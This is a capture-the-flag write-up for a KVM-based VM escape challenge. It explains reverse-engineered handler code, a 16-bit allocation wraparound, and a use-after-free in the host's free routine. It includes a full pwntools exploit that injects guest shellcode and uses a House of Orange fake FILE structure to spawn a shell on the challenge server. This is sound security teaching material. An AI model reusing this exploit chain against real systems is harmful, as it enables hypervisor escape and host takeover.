Tags: use-after-free ida vm arbitrary-code-execution
Rating:
**Description**
> Writing a vm is the best way to teach kids to learn vm escape.
>
> nc 34.236.229.208 9999
**Files provided**
- [kid-vm.zip](https://s3-us-west-1.amazonaws.com/realworldctf/kid_vm_801180ca894848965a2d6424472e0acb.zip)
**Solution**
A VM escape challenge. The VM is implemented on top of the KVM hypervisor interface, `/dev/kvm`. We need to escape the VM and get RCE on the host.
The program can't be run inside an Ubuntu virtual machine, since `/dev/kvm` is not available there.
Initially, I was trying to figure out what each `ioctl` does; however, this turned out not to be useful. What we need to do is look at how the VM handles special instructions such as `in`/`out`/`vmcall`, and at what the guest OS does.
Here is the code that handles `in` and `out`:
```c
case 2u:
if ( *((_BYTE *)p_vcpu + 32) == 1
&& *((_BYTE *)p_vcpu + 33) == 1
&& *((_WORD *)p_vcpu + 17) == 0x17
&& *((_DWORD *)p_vcpu + 9) == 1 )
{
putchar(*((char *)p_vcpu + p_vcpu[5]));// out to print to stdout
continue;
}
if ( !*((_BYTE *)p_vcpu + 32)
&& *((_BYTE *)p_vcpu + 33) == 1
&& *((_WORD *)p_vcpu + 17) == 23
&& *((_DWORD *)p_vcpu + 9) == 1 )
{
read(0, (char *)p_vcpu + p_vcpu[5], 1uLL);// in to get input from stdin
continue;
}
fwrite("Unhandled IO\n", 1uLL, 0xDuLL, stderr);
return 1LL;
```
And here is the code that handles `vmcall`, which is where memory operations are performed on the host machine:
```c
if ( vm_codes[*(_QWORD *)&regs[128]] == 0xF
&& vm_codes[*(_QWORD *)&regs[128] + 1] == 1
&& vm_codes[*(_QWORD *)&regs[128] + 2] == 0xC1u )
{//0f 01 c1 is the byte code of vmcall
if ( ioctl(fd_vcpu, 0x8090AE81uLL, regs) == -1 )
puts("Error get regs!");
switch ( *(unsigned __int16 *)regs )
{
case 0x101u:
free_host(*(__int16 *)&regs[8], *(unsigned __int16 *)&regs[16]);
break;
case 0x102u:
update_host(
*(__int16 *)&regs[8],
*(unsigned __int16 *)&regs[16],
*(unsigned __int16 *)&regs[24],
(__int64)vm_codes);
break;
case 0x100u:
alloc_host(*(unsigned __int16 *)&regs[8]);
break;
default:
puts("Function error!");
break;
}
}
```
Some of the `ioctl` constants can't be found in IDA; I don't know why. In addition, online resources are scarce and unclear, so the relevant data structures and macros are hard to identify, and I wasted a lot of time looking up what each `ioctl` does. Luckily, this is not very important for solving the challenge.
### guest OS arbitrary code execution
The guest OS memory is set here
```c
v13 = 0LL;
v14 = 0LL;
v15 = 0x10000LL;
v16 = vm_codes;
//vm_codes comes from data from 0x18E0
if ( ioctl(fd_vm, 0x4020AE46uLL, &v13) == -1 )// AE46 KVM_SET_USER_MEMORY_REGION
{
perror("Fail");
return 1LL;
}
```
Dump the 896 bytes of data at 0x18e0 and pad them with zeros so that the binary file is page-aligned (the program uses the memory after those 896 bytes for global variables), then analyze the result as 16-bit real-mode assembly. The reason is that a CPU starts in 16-bit real mode.
The picture is now clear: host memory allocation is implemented with `vmcall`, and input and output are implemented with `in` and `out`. The VM program handles each of these instructions when the guest executes it.
Normal memory allocation starts at 0x5000
```assembly
89 CF mov di, cx ; actual allocation
81 C1 00 50 add cx, 5000h
01 F6 add si, si
89 8C 46 03 mov ds:mems[si], cx
89 84 66 03 mov ds:sizes[si], ax
01 C7 add di, ax
89 3E 44 03 mov ds:next_alloc, di
A0 42 03 mov al, ds:num_of_mem
FE C0 inc al
A2 42 03 mov ds:num_of_mem, al
EB 1F jmp short loc_E1
;codes from alloc_6f
```
The size limitation for each chunk is 0x1000
```assembly
A1 40 03 mov ax, ds:alloc_size
3D 00 10 cmp ax, 1000h
77 33 ja short loc_C2
```
The max bound is 0xb000
```assembly
8B 0E 44 03 mov cx, ds:next_alloc
81 F9 00 B0 cmp cx, 0B000h
77 34 ja short loc_CD
```
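However, this check is flawed: because it uses `ja`, `next_alloc == 0xb000` is still accepted, and the resulting address `0xb000 + 0x5000 = 0x10000` wraps around to `0x0000` in a 16-bit register, which is exactly where the guest's code lives! So we can overwrite the code and get arbitrary code execution in the guest.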
PS: in 16 bits real mode, there is no such thing as RWX attribute of pages.
To test our idea, we can fill `0x0000-0x1000` with `hlt` or `int3` instructions; the VM clearly reacts differently in each case.
### VM escape
In `free_host`, there is a UAF:
```c
void __fastcall free_host(__int16 a1, unsigned __int16 a2)
{
if ( a2 <= 0x10u )
{
switch ( a1 )
{
case 2:
free((void *)buf[a2]);
buf[a2] = 0LL;
--dword_20304C;
break;
case 3:
free((void *)buf[a2]);
buf[a2] = 0LL;
sizes[a2] = 0;
--dword_20304C;
break;
case 1:
free((void *)buf[a2]); // UAF & double free
break;
}
}
else
{
perror("Index out of bound!");
}
}
```
However, this path cannot be reached unless we have arbitrary code execution in the guest OS, since the guest's own `vmcall` only ever uses case 3.
```assembly
68 00 01 push 100h
9D popf
B8 01 01 mov ax, 101h
BB 03 00 mov bx, 3
8A 0E 43 03 mov cl, ds:idx
0F 01 C1 vmcall
```
Also, `update_host` has an operation (case 2) that copies data from a host buffer back into guest memory, which lets us leak libc:
```c
void __fastcall update_host(__int16 a1, unsigned __int16 a2, unsigned __int16 a3, __int64 a4)
{
if ( a2 <= 0x10u )
{
if ( buf[a2] )
{
if ( (unsigned int)a3 <= sizes[a2] )
{
if ( a1 == 1 )
{
memcpy((void *)buf[a2], (const void *)(a4 + 0x4000), a3);
}
else if ( a1 == 2 )
{
memcpy((void *)(a4 + 0x4000), buf[a2], a3);
}
}
//....
```
Similarly, this will not be called unless we get arbitrary code execution in the guest OS.
Therefore, the vulnerability is a UAF with `0x80 <= size <= 0x1000`, and we can use House of Orange to exploit it.
The exploitation itself is not hard; just treat it as a normal heap pwn. I will not explain it in detail.
The exploit is
```python
from pwn import *
g_local=False
e=ELF('./libc-2.23.so')
context.log_level='debug'
UPDATE_RET_ADDR = 0x122
LAST_ALLOC_SIZE = 0x1F3
IO_STR_FINISH = 0x3c37b0
UNSORT_OFF = 0x7f603f138b78 - 0x7f603ed74000
if g_local:
sh = process('./kidvm')#, env={'LD_PRELOAD':'./libc-2.23.so'})
#gdb.attach(sh)
else:
sh = remote("34.236.229.208", 9999)
def alloc(size):
sh.send("1")
sh.recvuntil("Size:")
sh.send(p16(size))
sh.recvuntil("Your choice:")
def update(idx, content):
sh.send("2")
sh.recvuntil("Index:")
sh.send(chr(idx))
sh.recvuntil("Content:")
sh.send(content)
#sh.recvuntil("Your choice:")
def alloc_host(size):
push_0x100_popf = "\x68\x00\x01\x9D"
# forgot this initially, stuck for 1 hours :(
mov_ax = "\xB8" + p16(0x100)
mov_bx = "\xBB" + p16(size)
vmcall = "\x0f\x01\xc1"
return push_0x100_popf + mov_bx + mov_ax + vmcall
def update_host(size, idx, bx):
push_0x100_popf = "\x68\x00\x01\x9D"
mov_ax = "\xB8" + p16(0x102)
mov_bx = "\xBB" + p16(bx)
mov_cx = "\xB9" + p16(idx)
mov_dx = "\xBA" + p16(size)
vmcall = "\x0f\x01\xc1"
return push_0x100_popf + mov_ax + mov_bx + mov_cx + mov_dx + vmcall
def free_host(idx):
push_0x100_popf = "\x68\x00\x01\x9D"
mov_ax = "\xB8" + p16(0x101)
mov_bx = "\xBB" + p16(1) # 1 will cause UAF
mov_cx = "\xB9" + p16(idx)
vmcall = "\x0f\x01\xc1"
return push_0x100_popf + mov_ax + mov_bx + mov_cx + vmcall
def write_stdout(addr, size, ip):
mov_ax = "\xB8" + p16(addr)
mov_bx = "\xBB" + p16(size)
call = "\xE8" + p16(0x1f3 - (ip + len(mov_ax + mov_bx) + 3))
return mov_ax + mov_bx + call
def read_stdin(addr, size, ip):
mov_ax = "\xB8" + p16(addr)
mov_bx = "\xBB" + p16(size)
call = "\xE8" + p16(0x205 - (ip + len(mov_ax + mov_bx) + 3))
return mov_ax + mov_bx + call
sh.recvuntil("Your choice:")
for i in xrange(0,0xb):
alloc(0x1000)
alloc(LAST_ALLOC_SIZE)
#now edit 0xb to write code segment of guest OS
shellcode = alloc_host(0x80) #0
shellcode += alloc_host(0x80) #1
shellcode += free_host(0)
shellcode += update_host(8, 0, 2)
shellcode += write_stdout(0x4000, 8, len(shellcode) + UPDATE_RET_ADDR)
shellcode += free_host(1) #consolidate
shellcode += alloc_host(0x90) #2
shellcode += alloc_host(0x200) #3 edit 1 to edit this chunk header
rec = len(shellcode)
shellcode += alloc_host(0x80) #4 prevent consolidate
shellcode += free_host(3)
shellcode += read_stdin(0x4000, 0x10, len(shellcode) + UPDATE_RET_ADDR)
shellcode += update_host(0x10, 1, 1)
shellcode += read_stdin(0x4000, 0xE0, len(shellcode) + UPDATE_RET_ADDR)
shellcode += update_host(0xE0, 3, 1)
#shellcode += alloc_host(10)
shellcode += "\xEB" + chr((rec - (len(shellcode) + 2)) & 0xFF)
payload = "\xcc" * UPDATE_RET_ADDR
payload += shellcode
assert len(payload) < LAST_ALLOC_SIZE
payload += (LAST_ALLOC_SIZE - len(payload)) * "\x90"
update(0xb, payload)
libc_addr = u64(sh.recvuntil("\x00\x00")) - UNSORT_OFF
print hex(libc_addr)
fake_file = p64(0)
fake_file += p64(0x61)
fake_file += p64(libc_addr + UNSORT_OFF)
fake_file += p64(libc_addr + e.symbols["_IO_list_all"] - 0x10)
fake_file += p64(2) + p64(3)
fake_file += "\x00" * 8
fake_file += p64(libc_addr + next(e.search('/bin/sh\x00'))) #/bin/sh addr
fake_file += (0xc0-0x40) * "\x00"
fake_file += p32(0) #mode
fake_file += (0xd8-0xc4) * "\x00"
fake_file += p64(libc_addr + IO_STR_FINISH - 0x18) #vtable_addr
fake_file += (0xe8-0xe0) * "\x00"
fake_file += p64(libc_addr + e.symbols["system"])
sh.send(fake_file[0:0x10])
assert len(fake_file[0x10:]) == 0xE0
sh.send(fake_file[0x10:])
sh.interactive()
```
PS: It seems that `asm` in pwntools does not work for 16-bit assembly
- [mem2019](https://github.com/mem2019)
> It seems that asm in pwntools does not work for 16 bits assembly
It worked for me. I prefixed assembly with ".code16" directive.